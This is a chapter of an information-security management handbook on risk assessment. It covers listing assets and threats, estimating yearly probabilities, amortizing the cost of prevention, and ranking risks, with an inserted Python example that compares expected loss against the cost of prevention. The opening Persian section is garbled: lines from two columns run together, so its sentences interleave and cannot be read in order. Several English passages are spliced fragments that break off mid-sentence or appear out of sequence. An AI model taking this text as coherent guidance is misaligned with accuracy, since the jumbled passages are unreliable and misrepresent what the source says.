ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺁﻣﺎﺭﻱ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ
ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ؟
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﺎ ﻳﻚ ﺷـﺮﻛﺖ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ
ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ
oﺣﺴﻦ ﻧﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ؛ ﺩﻭﻟﺘﻲ ،ﻭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﻬﻢ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ .ﺩﺭ ﭼﻨـﻴﻦ ﻣـﻮﺍﺭﺩﻱ،
ﻥ ﭘﺮﺩﺍﺯﺵ؛ ﻭ oﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣـﺸﺎﻭﺭﻩﺍﻱ ﻛـﻪ ﻣﺘﺨـﺼﺺ
oﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ. ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧـﺮﻡ-
ﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ.
ﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺨﺼﺼ ﹺ
ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺠﺎﻱ ﺗﻮﺟﻪ ﺻﺮﻑ ﺑﻪ ﺟﻨﺒﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ،ﻧﮕﺮﺷـﻲ
ﻭﺳﻴﻌﺘﺮ ﺑﻪ ﺍﻗﻼﻡ ﻓﻮﻕ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺮﺑﻮﻃﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ .ﺍﮔـﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ
ﺷﻤﺎ ﻧﮕﺮﺍﻥ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ ﻛﻪ ﻛﺴﻲ ﺑﺘﻮﺍﻧﺪ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺎﻟﻲ
ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺍﻗﻼﻣﻲ ﻛﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ .ﺍﻳـﻦ
ﺷﻤﺎ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﺪ ،ﺷﻴﻮﺓ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻓﺮﺩ ﺑﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻃﺮﺡ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ ٦٩ﻭ ﺩﺍﻧـﺶ ﻋﺮﻓـﻲ
)ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭼـﻪ ﺍﺯ
ﺷــﻤﺎ ﺗﻨﻈــﻴﻢ ﺷــﻮﺩ .ﺍﻳــﻦ ﻓﺮﺁﻳﻨــﺪ ﻧﻴﺎﺯﻣﻨــﺪ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ
ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ( ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ ﻛﺎﺭﺑﺮﺩﻱ ،ﺩﺭﻙ ﻛﺎﻣﻞ ﺗﺴﻬﻴﻼﺕ ،ﻭ ﻋﻠـﻢ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﭘﻮﺷـﺶ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﻭ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ
ﺑﻴﻤﺔ ﺷﻤﺎ ﺍﺳﺖ .ﺍﻗﻼﻡ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻠﻤـﻮﺱ )ﻣﺜـﻞ
ﻣﺴﺪﻭﺩ ﺷﺪﻩ ﺑﺎﺷﻨﺪ. ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ،ﺻﻔﺤﺎﺕ ﻧﻤﺎﻳﺶ ،ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ ،ﺗﺠﻬﻴﺰﺍﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ،
ﻭ ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﻭ ﻳﺎ ﻏﻴﺮﻣﻠﻤﻮﺱ )ﻣﺜﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ،ﺭﻣـﺰ
ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ،ﺗﻮﺍﻧﺎﻳﻲ ﺍﺩﺍﻣﺔ ﭘﺮﺩﺍﺯﺵ ،ﻓﻬﺮﺳﺖ ﻣـﺸﺘﺮﻳﺎﻥ ،ﻭﺟﻬـﺔ ﻋﻤـﻮﻣﻲ ،ﻭ
ﻣﺮﺣﻠﺔ ﺑﻌﺪﻱ ﺗﻌﻴﻴﻦ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺩﺍﺭﺍﻳـﻲ ﺍﻋﺘﺒﺎﺭ ﺩﺭ ﺻﻨﻌﺖ( ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﻫﺮ ﭼﻴـﺰﻱ ﻛـﻪ ﺑـﺮﺍﻱ
ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺤﻴﻄـﻲ ﻫـﺴﺘﻨﺪ ﻭ ﺷـﺎﻣﻞ ﺷﻤﺎ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺑـﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺍﺭﺯﺷـﻤﻨﺪ
ﺁﺗﺶﺳﻮﺯﻱ ،ﺯﻟﺰﻟﻪ ،ﺍﻧﻔﺠﺎﺭ ﻭ ﺳﻴﻞ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﺑﺎﻳـﺪ ﺑﻮﺩﻥ ﻫﺮ ﻣﻮﺭﺩ ،ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﺨﺮﻳﺐ ﻳﺎ ﻓﻘـﺪﺍﻥ
ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﻣﺎ ﻣﻤﻜﻦ ﻫﻢ ﺑﺎﺷﻨﺪ؛ ﻣﺜﻞ ﺑـﺮﻭﺯ ﻧﻘـﺺ ﺁﻥ ،ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻭ ﭘﻮﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮ ﻳﺎ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺁﻥ
ﻛﻠﻲ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻥ ﻳﺎ ﭘﻴﺪﺍﺷﺪﻥ ﻣﻮﺍﺩ ﺁﺗـﺸﺰﺍ ﺩﺭ ﺩﻳﻮﺍﺭﻫـﺎﻱ ﺍﺗـﺎﻕ ﺑﻪ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﻣﻲﺷﻮﺩ .ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻳﻜﻪ ﺑﻄﻮﺭ ﺣﺘﻢ ﺑﺎﻳـﺪ ﺩﺭ
ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻧﻪﭼﻨﺪﺍﻥ ﻛﻮﺗﺎﻩ ﻭﺍﺩﺍﺭ ﻓﻬﺮﺳﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺑﻪ ﺗﺨﻠﻴﺔ ﺍﺗﺎﻕ ﻧﻤﺎﻳﺪ .ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺝ
ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﻧﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺩﺳـﺘﻪ ﺍﺯ ﻣﻮﺍﺭﺩ ﻣﻠﻤﻮﺱ:
ﺗﻬﺪﻳﺪﺍﺕ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ:
ﺭﺍﻳﺎﻧﻪﻫﺎ؛ o
ﺑﻴﻤﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻛﻠﻴﺪﻱ؛ • ﺩﺍﺩﻩﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ؛ o
ﺑﻴﻤﺎﺭﻱ ﻫﻤﺰﻣﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ )ﻧﻈﻴـﺮ ﺑﻴﻤﺎﺭﻳﻬـﺎﻱ • ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺑﺎﻳﮕﺎﻧﻲ؛ o
ﻣﺴﺮﻱ ﻣﺜﻞ ﺁﻧﻔﻮﻻﻧﺰﺍ(؛ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ،ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﻛﺘﺎﺑﻬﺎ؛ o
ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ )ﻣـﺮﮒ ،ﺑﺎﺯﻧﺸـﺴﺘﮕﻲ ،ﭘﺎﻳـﺎﻥ • ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ؛ o
ﻳﺎﻓﺘﻦ ﺩﻭﺭﺓ ﻛﺎﺭﻱ(؛ ﻭﺳﺎﻳﻞ ﺗﻮﺯﻳﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ؛ o
ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺷﺒﻜﻪ؛ • ﻭﺳﺎﻳﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻛﺎﺑﻞﻛﺸﻲﻫﺎ؛ o
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ )ﺗﻠﻔﻦ ،ﺑﺮﻕ ،ﺁﺏ( ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻛﻮﺗﺎﻩ؛ • ﺳﻮﺍﺑﻖ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻭ o
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ؛ • ﺍﺳﻨﺎﺩ ﺣﺴﺎﺑﺮﺳﻲﺷﺪﻩ. o
ﺻﺎﻋﻘﻪ؛ •
ﺳﻴﻞ؛ • ﻣﻮﺍﺭﺩ ﻏﻴﺮﻣﻠﻤﻮﺱ:
ﺳﺮﻗﺖ ﺩﻳﺴﻜﻬﺎ ﻳﺎ ﻧﻮﺍﺭﻫﺎ؛ • ﺍﻣﻨﻴﺖ ﻭ ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ؛ o
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛ • ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ؛ o
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛ • ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﻛﻨﺎﻥ؛ o
ﻭﺭﻭﺩ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ؛ • ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﻭ ﺍﻋﺘﺒﺎﺭ ﺳﺎﺯﻣﺎﻥ؛ o
ﻭﺭﺷﻜـﺴﺘﮕﻲ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻳـﺎ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﺩﻫﻨــﺪﺓ •
ﺧﺪﻣﺎﺕ ﻛﻠﻴﺪﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﺷﻤﺎ؛ 69 Business Plan
١٤٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﻢ .ﻳﻚ ﺷﻴﻮﺓ ﭘﻴﭽﻴﺪﻩﺗـ ﹺﺮ ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛ •
ﺍﺣﺘﺴﺎﺏ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﻋـﺪﻡ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ،ﺁﻣـﻮﺯﺵ ﻣﺠـﺪﺩ، ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ •
ﺭﻭﺍﻟﻬﺎﻱ ﺍﺿﺎﻓﻪﺷـﺪﺓ ﻧﺎﺷـﻲ ﺍﺯ ﺁﺳـﻴﺐ ،ﺍﺯ ﺩﺳـﺖ ﺭﻓـﺘﻦ ﺍﻋﺘﺒـﺎﺭ ﺧﺮﺍﺑﻜﺎﺭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ؛ •
ﺷﺮﻛﺖ ،ﻭ ﺣﺘﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﺷﺪﻩ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺷﺮﻛﺖ ﺍﺳﺖ. ﺧﺮﺍﺑﻜﺎﺭﻱ ﭘﺮﺳـﻨﻞ ﺷـﺨﺺ ﺛﺎﻟـﺚ )ﻣـﺜ ﹰ
ﻼ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ •
ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺰﻭﺩﻥ ﻋﻮﺍﻣﻞ ﺟـﺎﻧﺒﻲ ﺑـﻪ ﻣﺤﺎﺳـﺒﺔ ﻫﺰﻳﻨـﻪ ﺑﺎﻋـﺚ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ(؛
ﺯﺣﻤﺖ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭﻟﻲ ﺩﻗﺖ ﺗﺨﻤﻴﻦ ﺭﺍ ﺑﺎﻻ ﻣـﻲﺑـﺮﺩ .ﺩﺭ ﺍﻏﺘﺸﺎﺵ ﻛﺎﺭﻛﻨﺎﻥ؛ •
ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﻌﻴﻴﻦ ﺩﻗﻴﻖ ﺍﺭﺯﺵ ﻭ ﻫﺰﻳﻨﺔ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ ﺑـﻪ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﺷـﻤﺎ •
ﻧﻴﺴﺖ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺧﺘﺼﺎﺹ ﻳﻚ ﺑﺎﺯﻩ ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﻫﺰﻳﻨﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؛
ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻛﻔﺎﻳﺖ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻗﻼﻡ ﺁﺳـﻴﺐﺩﻳـﺪﻩ ﺭﺍ ﻛــﺎﺭﺑﺮﺍﻧﻲ ﻛــﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻧﻲ •
ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺩﺳــﺘﺔ ﺍﻗــﻼﻡ ﻏﻴﺮﻗﺎﺑــﻞ ﺗﻌﻤﻴــﺮ ﻭ ﺟــﺎﻳﮕﺰﻳﻨﻲ ﻳــﺎ ﺗﺤﺮﻳﻚﻛﻨﻨﺪﻩ ﻳﺎ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻲﻓﺮﺳﺘﻨﺪ؛ ﻭ
ﺟﺒﺮﺍﻥﻧﺎﭘﺬﻳﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ؛ ﻣﺜـﻞ ﭘـﺎﻙ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺟﺎﺳﻮﺳﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺗﺠﺎﺭﻱ. •
ﺣﺴﺎﺑﻬﺎ ،ﻳﺎ ﻣﺮﮒ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ .ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ ﻫﺰﻳﻨـﺔ
ﺍﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﺎ ﻣﻘﻴﺎﺳﻬﺎ ﻇﺮﻳﻔﺘﺮﻱ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ؛ ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ
ﻼ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺫﻳـﻞ ﻫﺰﻳﻨـﺔ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺩﺭﻧﻈـﺮ ﻣﺜ ﹰ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻜﺒـﺎﺭ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ
• The power company, on the basis of its experience over the past year, has an estimate of the probability of a power outage during the coming year. The responsible officials can also calculate the risk of an outage lasting a few seconds, a few minutes, or a few hours.
• Personnel records can help you estimate the probability that a key employee of the computer department will resign.
• The most optimistic guesses about past experience repeating itself can be used to estimate the probability that serious flaws will be discovered in your software during the coming year.

If you expect an incident to occur more than once a year, record the number of times it occurs in the course of one year. For example, if you predict an earthquake once every 100 years, then by this rule it appears in your list as 1%; but if you expect three serious flaws to be discovered in the Microsoft IIS server over the coming month, it becomes 3600%.

The Cost of Prevention

Finally, you must calculate the cost of preventing each kind of risk. For example, the cost of a momentary power outage will probably consist of the cost of staff idle time and of restarting the computers, whereas the cost of preventing it equals the cost of buying and installing a UPS system.

Costs must be amortized over the expected lifetime, using an appropriate approach. Working out these costs can bring to light other costs and credits that must also be taken into account. For example, installing a better fire-suppression system can reduce your fire-insurance premium and, through capital depreciation, give you a tax advantage; but spending money on a fire-suppression system means that the money is no longer available for other purposes, such as staff training or even investment.

Summing Up the Results

In the concluding section you should draw up a multi-column table of assets, risks and possible losses. For each loss you should know its probability, the predicted damage, and the amount of money needed to prevent it. If you are very thorough, you can also calculate the probability that your defensive measures will prove inadequate. The process of deciding whether or not to use each defensive mechanism is now entirely clear. It is enough to multiply the expected loss of each risk by the probability of its occurrence, so that you obtain one figure for each threat. Sort these figures in descending order and compare the figure for each threat with the cost of preventing it.

The result of this comparison is a prioritized list of what needs to be done. The list may be somewhat surprising at first. Note that your aim should be to prevent costly and probable losses and to pay less attention to rare and inexpensive ones. In many environments, events such as fire and the loss of key personnel are far more likely than a network break-in; yet, surprisingly, it is network break-ins that attract the attention of managers and, as a result, a large share of the budget. This practice is not cost-effective and does not provide the highest level of assurance for the system as a whole. To picture the actions you need to take, classify by priority what you have gathered about the prevention of and recovery from each incident. To do this, add the cost of recovery to the average expected loss and multiply the result by the probability of the incident. Then compare the results with the annual cost of prevention. If those costs are lower than the expected cost of the risk, you are advised, provided sufficient funds are available, to adopt the prevention strategy; but if the cost of prevention is higher than the cost of the damage and of recovery after the incident, take no action until the incident occurs.
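The ranking procedure in this section (add the recovery cost to the expected loss, multiply by the yearly probability, sort, and compare with the yearly cost of prevention) can be carried out mechanically. The Python code below is an added example, not part of the handbook: all figures are constructed, the names `Risk` and `rank_risks` are hypothetical, and straight-line amortization is assumed as the "appropriate approach" for spreading prevention costs over the expected lifetime.

```python
from dataclasses import dataclass


@dataclass
class Risk:
    name: str
    loss_per_event: float          # average expected loss from one occurrence
    recovery_per_event: float      # cost of recovering from one occurrence
    events_per_year: float         # 0.01 = once per 100 years (1%), 36 = 3600%
    prevention_capital: float      # purchase and installation of the safeguard
    lifetime_years: float          # expected lifetime of the safeguard
    running_per_year: float = 0.0  # yearly upkeep of the safeguard
    credits_per_year: float = 0.0  # yearly savings it brings (e.g. insurance)

    def annual_exposure(self) -> float:
        """(expected loss + recovery cost) x yearly probability of occurrence."""
        total = self.loss_per_event + self.recovery_per_event
        return round(total * self.events_per_year, 2)

    def annual_prevention(self) -> float:
        """Capital amortized straight-line (assumption) plus upkeep, less credits."""
        amortized = self.prevention_capital / self.lifetime_years
        return round(amortized + self.running_per_year - self.credits_per_year, 2)


def rank_risks(risks, budget=None):
    """Rank risks by yearly exposure (descending) and decide on each one.

    Returns (name, exposure, prevention, decision) tuples. A safeguard is
    chosen only when it costs less per year than the risk it removes and,
    if a yearly budget is given, only while funds remain.
    """
    ranked = sorted(risks, key=lambda r: r.annual_exposure(), reverse=True)
    rows, remaining = [], budget
    for r in ranked:
        exposure, prevention = r.annual_exposure(), r.annual_prevention()
        if prevention >= exposure:
            decision = "accept"        # prevention costs more than the risk
        elif remaining is not None and prevention > remaining:
            decision = "unfunded"      # worthwhile, but no money left
        else:
            decision = "prevent"
            if remaining is not None:
                remaining -= prevention
        rows.append((r.name, exposure, prevention, decision))
    return rows


# Constructed figures, for illustration only.
SAMPLE_RISKS = [
    Risk("momentary power outage", 2_000, 500, 4, 6_000, 5,
         running_per_year=300),
    Risk("earthquake", 2_000_000, 500_000, 0.01, 900_000, 30),
    Risk("serious server software flaw", 1_500, 500, 36, 10_000, 5,
         running_per_year=40_000),
    Risk("fire", 800_000, 200_000, 0.02, 150_000, 15,
         running_per_year=2_000, credits_per_year=3_000),
    Risk("network break-in", 30_000, 10_000, 0.1, 50_000, 5,
         running_per_year=15_000),
]

if __name__ == "__main__":
    for name, exposure, prevention, decision in rank_risks(SAMPLE_RISKS, budget=45_000):
        print(f"{name:30s} exposure/yr {exposure:>10,.2f}  "
              f"prevention/yr {prevention:>10,.2f}  {decision}")
```

With these constructed numbers the frequent, cheap software flaw outranks the rare, expensive earthquake, which is the kind of surprise the text warns about.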
Part Three: Information Technology Security and Organizations
for the successful provision of security
regard it as an important matter, and accept and carry out its rules and regulations just as other people do.

Fundamentally, computer security is a set of technical solutions to non-technical problems. A great deal of time, money and effort can be spent on securing a computer, but one can never be free of worry about the accidental erasure of data or the deliberate destruction of information. Given the right set of circumstances - software flaws, accidents, mistakes, bad luck, bad weather, or a well-equipped and motivated attacker - any computer can be misused, put out of action, or even completely destroyed.

The job of security professionals is to help the organization decide how much time and money it wants to devote to security. Another part of the job is to make sure that appropriate policies, guidelines and procedures exist in the organization so that the security budget is spent properly. Finally, the professionals must examine the system to make sure that the appropriate controls have been implemented correctly so that the goals are met. Practical security is therefore more a management issue than a technical one. Consequently, security must be one of the priorities of the organization's management. Even in very small establishments, where no significant budget is spent on security, management must understand the main security issues and put the basic principles of security into practice to protect its assets.

Effective computer security means protecting information. Although protecting other resources is also important, losses caused by damage to other resources are much easier to identify and make good than losses to information. All plans, policies and procedures must reflect the need to protect information in whatever form it may take. Proprietary information does not lose its value if it is printed or faxed to an office. Confidential customer information likewise remains highly valuable if it is reported by telephone instead of being sent by e-mail. In short, information must be protected regardless of the form it is in.

There are various kinds and differing definitions of computer security. Rather than offering a formal definition, this book takes a more practical approach and discusses the kinds of protection that should be considered.
and availability ranks last. In some highly classified environments, officials may prefer to blow up a building rather than allow information to fall into the hands of attackers.

University Environment

In such an environment, the integrity and availability of information are the most important requirements. Making sure that information is available when students need it is far more important than enabling administrators to determine when students used their accounts.

If you are a security administrator, you must understand the needs of your operational environment and users, and then define your procedures accordingly. Needless to say, the material described in this book

Accounting and auditing firms have teams of specialists who can evaluate the security of computer installations.

If you work with a smaller company or deal with personal computers, you may not have a specialized security department. In that case you are advised to study Part Two of the book carefully. You may think that this book goes into more detail than you need, but the information in these chapters will be a great help in setting your priorities.

Cost-Benefit Analysis and Best Practices

After completing the risk assessment, a long list of risks
Does this risk increase with the passage of time and the discovery of new vulnerabilities, or does it decrease as time passes and vulnerabilities are fixed? Does a well-maintained system become more secure or less secure over time? And how do you calculate the approximate damage caused by a successful break-in? Unfortunately, few scientific and statistical studies have been carried out on these questions. A great many people think they know the answers; but researchers have shown that most people cannot correctly estimate risks and their probability on the basis of personal experience.

